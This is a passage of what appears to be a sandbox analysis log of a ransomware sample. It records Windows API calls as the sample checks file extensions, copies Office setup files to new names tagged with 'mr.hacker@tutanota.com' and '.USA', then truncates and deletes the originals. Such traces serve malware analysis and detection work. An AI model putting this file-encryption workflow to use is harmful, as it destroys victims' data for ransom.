Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.353] lstrlenW (lpString=".1cd") returned 4 [0037.353] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0037.353] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0037.353] lstrlenW (lpString=".jpg") returned 4 [0037.353] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0037.353] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0037.353] lstrlenW (lpString="PSS10R.CHM") returned 10 [0037.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0040.137] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=27195) returned 1 [0040.137] CloseHandle (hObject=0x19c) returned 1 [0040.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20 [0040.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.429] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.429] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.429] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.429] GetLastError () returned 0x0 [0040.429] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0040.433] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0040.435] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.435] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.435] SetEndOfFile (hFile=0x1b8) returned 1 [0040.435] CloseHandle (hObject=0x1b8) returned 1 [0040.436] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.436] SetEndOfFile (hFile=0x1b4) returned 1 [0040.437] CloseHandle (hObject=0x1b4) returned 1 [0040.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString=".doc") returned 4 [0040.438] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString=".docx") returned 5 [0040.438] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.438] lstrlenW (lpString=".pdf") returned 4 [0040.438] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString=".xls") returned 4 [0040.438] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString=".xlsx") returned 5 [0040.438] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.438] lstrlenW (lpString=".ppt") returned 4 [0040.438] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString=".zip") returned 4 [0040.438] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString=".rar") returned 4 [0040.438] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString=".bz2") returned 4 [0040.438] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.438] lstrlenW (lpString=".7z") returned 3 [0040.438] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString=".dbf") returned 4 [0040.438] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString=".1cd") returned 4 [0040.438] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.438] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.438] lstrlenW (lpString=".jpg") returned 4 [0040.438] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString=".doc") returned 4 [0040.439] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString=".docx") returned 5 [0040.439] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.439] lstrlenW (lpString=".pdf") returned 4 [0040.439] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString=".xls") returned 4 [0040.439] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString=".xlsx") returned 5 [0040.439] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.439] lstrlenW (lpString=".ppt") returned 4 [0040.439] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString=".zip") returned 4 [0040.439] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString=".rar") returned 4 [0040.439] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString=".bz2") returned 4 [0040.439] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.439] lstrlenW (lpString=".7z") returned 3 [0040.439] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString=".dbf") returned 4 [0040.439] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString=".1cd") returned 4 [0040.439] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.439] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.439] lstrlenW (lpString=".jpg") returned 4 [0040.439] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.440] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.440] lstrlenW (lpString="Office32WW.XML") returned 14 [0040.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.440] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=4274) returned 1 [0040.440] CloseHandle (hObject=0x1b4) returned 1 [0040.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20 [0040.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.440] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.440] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.441] GetLastError () returned 0x0 [0040.441] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x10b2, lpOverlapped=0x0) returned 1 [0040.442] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0040.443] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.443] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.443] SetEndOfFile (hFile=0x1b8) returned 1 [0040.443] CloseHandle (hObject=0x1b8) returned 1 [0040.444] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.444] SetEndOfFile (hFile=0x1b4) returned 1 [0040.445] CloseHandle (hObject=0x1b4) returned 1 [0040.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.445] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0040.445] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".doc") returned 4 [0040.446] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString=".docx") returned 5 [0040.446] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.446] lstrlenW (lpString=".pdf") returned 4 [0040.446] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString=".xls") returned 4 [0040.446] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString=".xlsx") returned 5 [0040.446] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.446] lstrlenW (lpString=".ppt") returned 4 [0040.446] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".zip") returned 4 [0040.446] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.446] lstrlenW (lpString=".rar") returned 4 [0040.446] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString=".bz2") returned 4 [0040.446] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString=".7z") returned 3 [0040.446] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".dbf") returned 4 [0040.446] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".1cd") returned 4 [0040.446] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".jpg") returned 4 [0040.446] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.446] lstrlenW (lpString=".doc") returned 4 [0040.447] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString=".docx") returned 5 [0040.447] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.447] lstrlenW (lpString=".pdf") returned 4 [0040.447] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString=".xls") returned 4 [0040.447] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString=".xlsx") returned 5 [0040.447] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.447] lstrlenW (lpString=".ppt") returned 4 [0040.447] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.447] lstrlenW (lpString=".zip") returned 4 [0040.447] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.447] lstrlenW (lpString=".rar") returned 4 [0040.447] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString=".bz2") returned 4 [0040.447] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString=".7z") returned 3 [0040.447] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.447] lstrlenW (lpString=".dbf") returned 4 [0040.447] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.447] lstrlenW (lpString=".1cd") returned 4 [0040.447] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.447] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.447] lstrlenW (lpString=".jpg") returned 4 [0040.447] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.447] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0040.447] lstrlenW (lpString="OneNoteMUI.XML") returned 14 [0040.447] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.448] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1606) returned 1 [0040.448] CloseHandle (hObject=0x1b4) returned 1 [0040.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20 [0040.448] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0040.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.448] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.448] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.450] GetLastError () returned 0x0 [0040.450] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x646, lpOverlapped=0x0) returned 1 [0040.452] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x650, lpOverlapped=0x0) returned 1 [0040.452] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0040.452] WriteFile (in: hFile=0x1b8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.453] SetEndOfFile (hFile=0x1b8) returned 1 [0040.455] CloseHandle (hObject=0x1b8) returned 1 [0040.456] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0040.456] SetEndOfFile (hFile=0x1b4) returned 1 [0040.456] CloseHandle (hObject=0x1b4) returned 1 [0040.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0040.457] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.457] lstrlenW (lpString=".doc") returned 4 [0040.457] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".docx") returned 5 [0040.457] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.457] lstrlenW (lpString=".pdf") returned 4 [0040.457] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".xls") returned 4 [0040.457] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".xlsx") returned 5 [0040.457] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.457] lstrlenW (lpString=".ppt") returned 4 [0040.457] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.457] lstrlenW (lpString=".zip") returned 4 [0040.457] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.457] lstrlenW (lpString=".rar") returned 4 [0040.457] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.457] lstrlenW (lpString=".bz2") returned 4 [0040.457] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".7z") returned 3 [0040.458] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString=".dbf") returned 4 [0040.458] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString=".1cd") returned 4 [0040.458] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString=".jpg") returned 4 [0040.458] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.458] lstrlenW (lpString=".doc") returned 4 [0040.458] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.458] lstrlenW (lpString=".docx") returned 5 